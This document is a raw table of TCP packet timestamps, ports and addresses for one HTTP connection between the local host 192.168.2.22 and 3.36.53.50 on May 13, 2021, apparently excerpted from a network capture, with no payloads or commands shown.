May 13, 2021 08:29:35.002789021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002791882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002830029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002854109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002865076 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002872944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002899885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002923965 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002934933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002948999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002969027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002995014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003002882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003015995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003036976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003051996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003079891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003084898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003118992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003128052 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003154039 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003177881 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003189087 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003190994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003222942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003235102 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003257036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.003268957 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.003303051 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004728079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004761934 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004797935 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004801989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004812956 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004832029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004861116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004865885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004879951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004900932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004933119 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004935026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004947901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.004977942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.004980087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005017042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005036116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005050898 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005069017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005085945 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005120993 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005125999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005136967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005153894 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005170107 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005187988 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005217075 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005223036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005239010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005264997 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005280972 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005302906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005310059 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005336046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005347967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005373001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005430937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005438089 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005438089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005474091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005486012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005508900 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005522013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005543947 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005559921 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005578995 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005588055 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005613089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005629063 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005649090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005655050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005681992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005692005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005723953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005726099 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005763054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005768061 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005798101 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005814075 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005832911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005867004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005877018 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005901098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005917072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005923986 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005935907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005963087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.005970955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.005986929 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006014109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006017923 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006052017 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006069899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006086111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006097078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006122112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006134033 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006155968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006175995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006191015 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006207943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006226063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006252050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006259918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006282091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006302118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006303072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006340027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006345034 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006373882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006386042 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006409883 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006418943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006444931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006452084 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006479979 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006489992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006515026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006526947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006550074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006561041 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006592989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006597042 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006632090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006643057 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006664991 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006676912 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006699085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006711006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006733894 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006757021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006767035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006792068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006802082 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006817102 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006836891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006848097 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006880045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006886005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006918907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006926060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006953955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.006966114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.006989956 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007002115 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007025003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007040024 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007057905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007069111 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007093906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007102013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007128000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007139921 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007169962 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007169962 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007208109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007215023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007241011 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007251978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007276058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007287979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007311106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007323027 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007344007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007355928 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007379055 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007385969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007412910 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007424116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007456064 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007460117 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007496119 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007499933 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007530928 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007544041 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007565022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007575989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007600069 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007611036 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007633924 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007644892 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007668018 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007675886 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007702112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007714987 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007745028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007746935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007782936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007790089 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007817030 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007827997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007852077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007863045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007885933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007896900 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007919073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007930994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007953882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007965088 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.007987976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.007998943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.008029938 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.008030891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.008074999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100712061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100769043 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100785017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100814104 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100819111 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100851059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100853920 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100889921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100891113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100925922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.100929022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100969076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.100972891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101015091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101015091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101051092 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101061106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101088047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101092100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101125002 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101155996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101161003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101196051 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101198912 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101203918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101237059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101238966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101275921 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101284027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101324081 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101324081 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101361036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101362944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101402998 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101427078 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101465940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101468086 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101505041 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101514101 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101541042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101543903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101578951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101579905 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101615906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101617098 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101654053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.101661921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.101702929 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.267483950 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.267627954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.270724058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.270783901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.293008089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.293119907 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302335978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302390099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302431107 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302453995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302468061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302483082 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302500963 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302509069 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302517891 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302546978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302556038 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302596092 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302597046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302634001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.302634954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.302670956 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303615093 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303663969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303678989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303705931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303705931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303745031 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303772926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303811073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303812981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303847075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303850889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303884029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303884983 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303921938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.303925037 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303961992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.303968906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304011106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304011106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304048061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304049969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304085016 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304094076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304121971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304157972 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304194927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304229975 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304276943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304280996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304317951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304322958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304352045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304353952 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304392099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304402113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304429054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304430008 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304466009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304476023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304503918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304503918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304542065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304544926 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304580927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304588079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304629087 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304630995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304666042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304667950 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304752111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304790020 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304799080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304805994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304840088 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304845095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304874897 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.304884911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304929972 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.304932117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305008888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305041075 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305047035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305047989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.305083036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.305094957 CEST	49167	80	192.168.2.22	3.36.53.50
